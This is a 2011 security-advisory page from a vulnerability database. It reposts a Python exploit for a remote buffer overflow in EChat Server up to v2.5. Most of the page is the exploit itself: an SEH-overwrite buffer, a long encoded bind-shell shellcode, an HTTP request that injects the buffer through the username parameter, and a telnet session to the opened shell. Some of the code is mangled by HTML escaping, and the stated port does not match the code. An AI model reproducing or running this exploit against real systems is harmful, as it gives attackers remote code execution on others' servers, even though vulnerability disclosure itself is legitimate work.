Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26856
HistoryAug 17, 2011 - 12:00 a.m.

INSECT Pro - Exploit EChat Server <= v2.5 20110812 - Remote Buffer Overflow Exploit

2011-08-1700:00:00
vulners.com
20

Information

Name : EChat Server <= v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>

Description

EChat Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary-checks on user-supplied
data.
Successfully exploiting this issue will allow an attacker to execute
arbitrary code within the context of the affected application. Failed
exploit attempts will result in a denial-of-service condition.

Exploit example as follow

#!/usr/bin/python

Easy Chat Server Server <= v2.5 Remote Buffer Overflow Exploit

Written by Juan Sacco (Runlvl)

Contact: [email protected]

Web site: http://www.insecurityresearch.com

Target tested: Windows XP SP3

import string, sys
import socket, httplib
import telnetlib

def howtousage():
print "Sorry, required arguments: Host Port"
sys.exit(-1)

def run():
try:
# Basic structure: JUNK + NSEH + SEH + SHELLCODE
Junk = '\x41' * 216 # 216 bytes of A
nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short
SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret

# ShellCode Bind TCP PORT 444 Lenght 751 Encode : Alpha Upper
ShellCode = &#40;
&quot;&#92;x89&#92;xe1&#92;xd9&#92;xed&#92;xd9&#92;x71&#92;xf4&#92;x5f&#92;x57&#92;x59&#92;x49&#92;x49&#92;x49&#92;x49&#92;x43&quot;
&quot;&#92;x43&#92;x43&#92;x43&#92;x43&#92;x43&#92;x51&#92;x5a&#92;x56&#92;x54&#92;x58&#92;x33&#92;x30&#92;x56&#92;x58&#92;x34&quot;
&quot;&#92;x41&#92;x50&#92;x30&#92;x41&#92;x33&#92;x48&#92;x48&#92;x30&#92;x41&#92;x30&#92;x30&#92;x41&#92;x42&#92;x41&#92;x41&quot;
&quot;&#92;x42&#92;x54&#92;x41&#92;x41&#92;x51&#92;x32&#92;x41&#92;x42&#92;x32&#92;x42&#92;x42&#92;x30&#92;x42&#92;x42&#92;x58&quot;
&quot;&#92;x50&#92;x38&#92;x41&#92;x43&#92;x4a&#92;x4a&#92;x49&#92;x4b&#92;x4c&#92;x5a&#92;x48&#92;x4b&#92;x39&#92;x43&#92;x30&quot;
&quot;&#92;x45&#92;x50&#92;x45&#92;x50&#92;x43&#92;x50&#92;x4c&#92;x49&#92;x4b&#92;x55&#92;x50&#92;x31&#92;x4e&#92;x32&#92;x45&quot;
&quot;&#92;x34&#92;x4c&#92;x4b&#92;x50&#92;x52&#92;x50&#92;x30&#92;x4c&#92;x4b&#92;x56&#92;x32&#92;x54&#92;x4c&#92;x4c&#92;x4b&quot;
&quot;&#92;x50&#92;x52&#92;x52&#92;x34&#92;x4c&#92;x4b&#92;x54&#92;x32&#92;x47&#92;x58&#92;x54&#92;x4f&#92;x4e&#92;x57&#92;x51&quot;
&quot;&#92;x5a&#92;x56&#92;x46&#92;x50&#92;x31&#92;x4b&#92;x4f&#92;x50&#92;x31&#92;x4f&#92;x30&#92;x4e&#92;x4c&#92;x47&#92;x4c&quot;
&quot;&#92;x45&#92;x31&#92;x43&#92;x4c&#92;x43&#92;x32&#92;x56&#92;x4c&#92;x47&#92;x50&#92;x4f&#92;x31&#92;x58&#92;x4f&#92;x54&quot;
&quot;&#92;x4d&#92;x45&#92;x51&#92;x58&#92;x47&#92;x5a&#92;x42&#92;x4c&#92;x30&#92;x51&#92;x42&#92;x56&#92;x37&#92;x4c&#92;x4b&quot;
&quot;&#92;x56&#92;x32&#92;x52&#92;x30&#92;x4c&#92;x4b&#92;x50&#92;x42&#92;x47&#92;x4c&#92;x45&#92;x51&#92;x58&#92;x50&#92;x4c&quot;
&quot;&#92;x4b&#92;x47&#92;x30&#92;x54&#92;x38&#92;x4d&#92;x55&#92;x49&#92;x50&#92;x52&#92;x54&#92;x51&#92;x5a&#92;x45&#92;x51&quot;
&quot;&#92;x4e&#92;x30&#92;x56&#92;x30&#92;x4c&#92;x4b&#92;x50&#92;x48&#92;x54&#92;x58&#92;x4c&#92;x4b&#92;x56&#92;x38&#92;x51&quot;
&quot;&#92;x30&#92;x45&#92;x51&#92;x58&#92;x53&#92;x5a&#92;x43&#92;x47&#92;x4c&#92;x51&#92;x59&#92;x4c&#92;x4b&#92;x56&#92;x54&quot;
&quot;&#92;x4c&#92;x4b&#92;x45&#92;x51&#92;x49&#92;x46&#92;x50&#92;x31&#92;x4b&#92;x4f&#92;x50&#92;x31&#92;x49&#92;x50&#92;x4e&quot;
&quot;&#92;x4c&#92;x49&#92;x51&#92;x58&#92;x4f&#92;x54&#92;x4d&#92;x45&#92;x51&#92;x58&#92;x47&#92;x56&#92;x58&#92;x4d&#92;x30&quot;
&quot;&#92;x54&#92;x35&#92;x5a&#92;x54&#92;x54&#92;x43&#92;x43&#92;x4d&#92;x4b&#92;x48&#92;x47&#92;x4b&#92;x43&#92;x4d&#92;x47&quot;
&quot;&#92;x54&#92;x52&#92;x55&#92;x4d&#92;x32&#92;x50&#92;x58&#92;x4c&#92;x4b&#92;x51&#92;x48&#92;x51&#92;x34&#92;x43&#92;x31&quot;
&quot;&#92;x4e&#92;x33&#92;x43&#92;x56&#92;x4c&#92;x4b&#92;x54&#92;x4c&#92;x50&#92;x4b&#92;x4c&#92;x4b&#92;x56&#92;x38&#92;x45&quot;
&quot;&#92;x4c&#92;x45&#92;x51&#92;x58&#92;x53&#92;x4c&#92;x4b&#92;x43&#92;x34&#92;x4c&#92;x4b&#92;x45&#92;x51&#92;x4e&#92;x30&quot;
&quot;&#92;x4c&#92;x49&#92;x50&#92;x44&#92;x56&#92;x44&#92;x56&#92;x44&#92;x51&#92;x4b&#92;x51&#92;x4b&#92;x45&#92;x31&#92;x51&quot;
&quot;&#92;x49&#92;x50&#92;x5a&#92;x50&#92;x51&#92;x4b&#92;x4f&#92;x4d&#92;x30&#92;x56&#92;x38&#92;x51&#92;x4f&#92;x50&#92;x5a&quot;
&quot;&#92;x4c&#92;x4b&#92;x54&#92;x52&#92;x5a&#92;x4b&#92;x4b&#92;x36&#92;x51&#92;x4d&#92;x52&#92;x48&#92;x56&#92;x53&#92;x47&quot;
&quot;&#92;x42&#92;x43&#92;x30&#92;x45&#92;x50&#92;x43&#92;x58&#92;x43&#92;x47&#92;x43&#92;x43&#92;x47&#92;x42&#92;x51&#92;x4f&quot;
&quot;&#92;x56&#92;x34&#92;x52&#92;x48&#92;x50&#92;x4c&#92;x52&#92;x57&#92;x56&#92;x46&#92;x45&#92;x57&#92;x4b&#92;x4f&#92;x4e&quot;
&quot;&#92;x35&#92;x4e&#92;x58&#92;x5a&#92;x30&#92;x45&#92;x51&#92;x43&#92;x30&#92;x45&#92;x50&#92;x51&#92;x39&#92;x4f&#92;x34&quot;
&quot;&#92;x51&#92;x44&#92;x56&#92;x30&#92;x52&#92;x48&#92;x51&#92;x39&#92;x4d&#92;x50&#92;x52&#92;x4b&#92;x45&#92;x50&#92;x4b&quot;
&quot;&#92;x4f&#92;x4e&#92;x35&#92;x56&#92;x30&#92;x56&#92;x30&#92;x50&#92;x50&#92;x50&#92;x50&#92;x47&#92;x30&#92;x50&#92;x50&quot;
&quot;&#92;x47&#92;x30&#92;x50&#92;x50&#92;x52&#92;x48&#92;x5a&#92;x4a&#92;x54&#92;x4f&#92;x49&#92;x4f&#92;x4d&#92;x30&#92;x4b&quot;
&quot;&#92;x4f&#92;x49&#92;x45&#92;x4d&#92;x59&#92;x58&#92;x47&#92;x50&#92;x31&#92;x49&#92;x4b&#92;x56&#92;x33&#92;x52&#92;x48&quot;
&quot;&#92;x43&#92;x32&#92;x43&#92;x30&#92;x54&#92;x51&#92;x51&#92;x4c&#92;x4b&#92;x39&#92;x4d&#92;x36&#92;x43&#92;x5a&#92;x54&quot;
&quot;&#92;x50&#92;x56&#92;x36&#92;x50&#92;x57&#92;x52&#92;x48&#92;x49&#92;x52&#92;x49&#92;x4b&#92;x56&#92;x57&#92;x43&#92;x57&quot;
&quot;&#92;x4b&#92;x4f&#92;x58&#92;x55&#92;x50&#92;x53&#92;x56&#92;x37&#92;x52&#92;x48&#92;x4f&#92;x47&#92;x4b&#92;x59&#92;x50&quot;
&quot;&#92;x38&#92;x4b&#92;x4f&#92;x4b&#92;x4f&#92;x49&#92;x45&#92;x51&#92;x43&#92;x51&#92;x43&#92;x51&#92;x47&#92;x43&#92;x58&quot;
&quot;&#92;x43&#92;x44&#92;x5a&#92;x4c&#92;x47&#92;x4b&#92;x4b&#92;x51&#92;x4b&#92;x4f&#92;x49&#92;x45&#92;x51&#92;x47&#92;x4c&quot;
&quot;&#92;x49&#92;x4f&#92;x37&#92;x52&#92;x48&#92;x52&#92;x55&#92;x52&#92;x4e&#92;x50&#92;x4d&#92;x45&#92;x31&#92;x4b&#92;x4f&quot;
&quot;&#92;x4e&#92;x35&#92;x45&#92;x38&#92;x45&#92;x33&#92;x52&#92;x4d&#92;x45&#92;x34&#92;x45&#92;x50&#92;x4c&#92;x49&#92;x5a&quot;
&quot;&#92;x43&#92;x51&#92;x47&#92;x51&#92;x47&#92;x51&#92;x47&#92;x50&#92;x31&#92;x5a&#92;x56&#92;x52&#92;x4a&#92;x45&#92;x42&quot;
&quot;&#92;x51&#92;x49&#92;x56&#92;x36&#92;x4d&#92;x32&#92;x4b&#92;x4d&#92;x45&#92;x36&#92;x4f&#92;x37&#92;x51&#92;x54&#92;x51&quot;
&quot;&#92;x34&#92;x47&#92;x4c&#92;x43&#92;x31&#92;x43&#92;x31&#92;x4c&#92;x4d&#92;x47&#92;x34&#92;x56&#92;x44&#92;x54&#92;x50&quot;
&quot;&#92;x49&#92;x56&#92;x45&#92;x50&#92;x51&#92;x54&#92;x51&#92;x44&#92;x50&#92;x50&#92;x50&#92;x56&#92;x56&#92;x36&#92;x56&quot;
&quot;&#92;x36&#92;x47&#92;x36&#92;x51&#92;x46&#92;x50&#92;x4e&#92;x51&#92;x46&#92;x50&#92;x56&#92;x56&#92;x33&#92;x51&#92;x46&quot;
&quot;&#92;x43&#92;x58&#92;x52&#92;x59&#92;x58&#92;x4c&#92;x47&#92;x4f&#92;x4c&#92;x46&#92;x4b&#92;x4f&#92;x58&#92;x55&#92;x4c&quot;
&quot;&#92;x49&#92;x4b&#92;x50&#92;x50&#92;x4e&#92;x51&#92;x46&#92;x47&#92;x36&#92;x4b&#92;x4f&#92;x56&#92;x50&#92;x45&#92;x38&quot;
&quot;&#92;x54&#92;x48&#92;x4d&#92;x57&#92;x45&#92;x4d&#92;x43&#92;x50&#92;x4b&#92;x4f&#92;x49&#92;x45&#92;x4f&#92;x4b&#92;x4b&quot;
&quot;&#92;x4e&#92;x54&#92;x4e&#92;x50&#92;x32&#92;x4b&#92;x5a&#92;x52&#92;x48&#92;x4e&#92;x46&#92;x4c&#92;x55&#92;x4f&#92;x4d&quot;
&quot;&#92;x4d&#92;x4d&#92;x4b&#92;x4f&#92;x4e&#92;x35&#92;x47&#92;x4c&#92;x54&#92;x46&#92;x43&#92;x4c&#92;x45&#92;x5a&#92;x4b&quot;
&quot;&#92;x30&#92;x4b&#92;x4b&#92;x4b&#92;x50&#92;x54&#92;x35&#92;x43&#92;x35&#92;x4f&#92;x4b&#92;x47&#92;x37&#92;x45&#92;x43&quot;
&quot;&#92;x52&#92;x52&#92;x52&#92;x4f&#92;x43&#92;x5a&#92;x45&#92;x50&#92;x51&#92;x43&#92;x4b&#92;x4f&#92;x4e&#92;x35&#92;x41&quot;
&quot;&#92;x41&quot;&#41;
ShellCodePort = 4444
CraftedBuffer = Junk + nSEH + SEH + ShellCode
vulnerableURL = &#39;/chat.ghp?username=&#39; + CraftedBuffer +

'&password=null&room=1&null=2'

Connection = httplib.HTTPConnection&#40;Host, Port&#41;
Connection.request&#40;&#39;GET&#39;, vulnerableURL&#41;
Connection.close&#40;&#41;

print &quot;Connecting to &quot; + Host
TelnetConnection = telnetlib.Telnet&#40;Host, ShellCodePort&#41;
TelnetConnection.interact&#40;&#41;

except:
print "Exploit connection closed"

if name == 'main':
print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
print "Author: Juan Sacco (Runlvl)"

try:
Host = sys.argv[1]
Port = sys.argv[2]
except IndexError:
howtousage()
run()

Author

Juan Sacco (Runlvl) - http://www.insecurityresearch.com


Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned